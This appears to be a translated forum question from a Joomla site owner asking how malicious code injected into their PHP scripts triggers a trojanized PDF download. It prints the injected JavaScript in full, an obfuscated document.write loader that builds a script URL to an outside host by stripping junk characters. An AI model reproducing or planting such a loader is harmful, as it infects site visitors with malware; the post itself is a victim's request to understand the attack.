Joomla của tôi! trang web đã nhiều lần bị tấn công. Ai đó, bằng cách nào đó, đã quản lý để đưa những thứ rác rưởi sau vào các tập lệnh php quan trọng, nhưng ý tôi là không nói về việc cấu hình Joomla. Trang web không được truy cập nhiều (đôi khi tôi sợ rằng mình có thể là khách truy cập duy nhất vào trang web đó ...) và tôi không quan tâm lắm đến việc sao lưu và chạy trang web. Cuối cùng thì tôi sẽ giải quyết.
Câu hỏi của tôi là, rác này hoạt động như thế nào? Tôi nhìn vào nó và tôi chỉ không thấy điều này có gây hại gì không? Những gì nó làm là nó cố gắng tải xuống một tệp PDF có tên ChangeLog.pdf, tệp này bị nhiễm trojan và sau khi mở sẽ đóng băng Acrobat của bạn và tàn phá máy tính của bạn. Làm thế nào nó làm điều đó, tôi không biết, tôi không quan tâm. Nhưng làm thế nào để đoạn script sau gọi tải xuống?
<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET đã phát hiện mã này là trojan JS / TrojanDownloader.Agent.NRO